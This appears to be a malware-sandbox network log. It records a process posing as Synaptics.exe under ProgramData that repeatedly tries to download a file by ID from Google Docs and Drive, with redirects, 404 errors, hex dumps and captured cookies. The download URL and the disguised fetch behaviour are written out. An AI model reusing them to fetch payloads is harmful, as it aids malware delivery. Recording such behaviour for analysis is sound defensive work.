                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        52192.168.2.449888142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:03 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-24 21:12:04 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:04 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-hjWohUsf45nwCZiwkSCw_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        53192.168.2.449898142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:06 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:07 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:07 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-B7U9ZwBRqlQAtvg2fFOblQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        54192.168.2.449900142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:06 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:07 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:07 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-wtrmlB6PWPrtBucvup-3Pw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        55192.168.2.449897142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:06 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:07 UTC1243INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC6_w0ykohPpKsjtoZ56KJDzBPFu0JoPK49HR0KKLo5Yz3FkrtdAv1ueB4zm0bUvLChp
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:07 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9l9ddGzrBuXwAHyAuWgxGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:12:07 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                        2024-12-24 21:12:07 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 54 32 49 4d 65 41 5a 2d 58 2d 56 37 6c 67 64 75 63 4c 33 51 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                        Data Ascii: t Found)!!1</title><style nonce="AT2IMeAZ-X-V7lgducL3Qw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                        2024-12-24 21:12:07 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        56192.168.2.449899142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:06 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:07 UTC1250INHTTP/1.1 404 Not Found
                                                                                        X-GUploader-UploadID: AFiumC43HM8bEOZiQUveYCWjJjbGzcd8pvjx8i4L2guVwCiMSAGrzavNYdou07rw7dKdfIVj7vW3PsI
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:07 GMT
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-nvGiOzTDuc_5ecr-vOND6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-24 21:12:07 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                        2024-12-24 21:12:07 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 68 71 4a 58 54 45 38 79 42 38 4e 6e 5f 4b 6c 6e 5f 73 62 31 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                        Data Ascii: 404 (Not Found)!!1</title><style nonce="LhqJXTE8yB8Nn_Kln_sb1A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                        2024-12-24 21:12:07 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                        Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        57192.168.2.449917142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:09 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:10 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:10 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SDLRBOBOEFbx04jzWJaWpw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        58192.168.2.449918142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:09 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:10 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:10 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce--8Z1BUr6QJAmMlPOXGkakw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        59192.168.2.449927142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:12 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:13 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:12 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-X0osqPpAlkgnIzeFmxrFvQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        60192.168.2.449929142.250.181.14437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:12 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        61192.168.2.449928142.250.181.144437644C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-24 21:12:12 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        Cookie: NID=520=UI-98dUkItclliIk2WSXWLZte3xsvWEC6nPvd6glxakMl_ry_mQtvBoTYS_0iqUuYMFT4JdzcRj9TfcFKKD0ibVhP3-cxeYL9qZacytp0c9FK4TTI8dTwF_VVzRIT7_XUD--ljsfmhX5B02tj5rCyqFfLv9hwl7wdf0LpM1eWbF42tCzSDCSRZFR
                                                                                        2024-12-24 21:12:13 UTC1314INHTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Tue, 24 Dec 2024 21:12:12 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
